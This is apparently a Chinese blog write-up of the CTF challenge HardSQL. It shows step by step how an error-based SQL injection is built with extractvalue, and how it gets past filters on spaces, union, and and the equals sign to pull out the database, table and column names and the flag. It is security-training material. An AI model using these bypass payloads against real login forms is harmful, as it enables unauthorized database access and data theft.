[极客大挑战 2019]HardSQL

本文详细描述了一次SQL注入攻击的过程,从发现注入点到绕过过滤,使用extractvalue函数进行报错注入,最终成功获取数据库名、表名、列名以及部分被截断的敏感信息。通过右连接函数解决长度限制,完整暴露了flag内容。展示了SQL注入攻防的技术细节和思考过程。
摘要由CSDN通过智能技术生成

一道sql注入题,进入题目链接之后是个登录框

先随便输入点东西,看看能回显出什么东西来

此时发现url中出现了刚刚我们输入的东西,应该是个get型注入了,尝试在password处测试。把基本步骤都走了一遍,只得到了这样一个页面

猜测应该是过滤掉了一些东西,查看源码也没啥发现,bp抓包进行fuzz测试一下

可以看到union和and都被过滤掉了,联合查询没了,那就尝试报错注入了,用updatexml()函数或extravalue()函数都行

注入过程中发现还过滤掉了空格,用()进行绕过,用^来连接函数,形成异或

爆数据库:

Payload:username=11&password=1'^extractvalue(1,concat(0x7e,(select(database()))))%23

得到数据库名

接着进行爆表,此时发现这里还过滤了=符号,用like进行替换。

Payload:username=11&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables))where(table_schema)like('geek')))%23

得到geek下的表

接着爆列名

Payload:username=11&password=1'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns))where(table_name)like('H4rDsq1')))%23

得到

接着查password内容

Payload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

看到了flag,但是是不全的。。。

应该是内容太长了受到了限制,百度了解到extractvalue函数一次只能查询32位长度,这里可以用right()查右边剩下的半部分

Payload:username=44&password=1'^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

拼接起来就是flag了,这里要注意看一下,有一部分是上半的flag内容中有了的

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值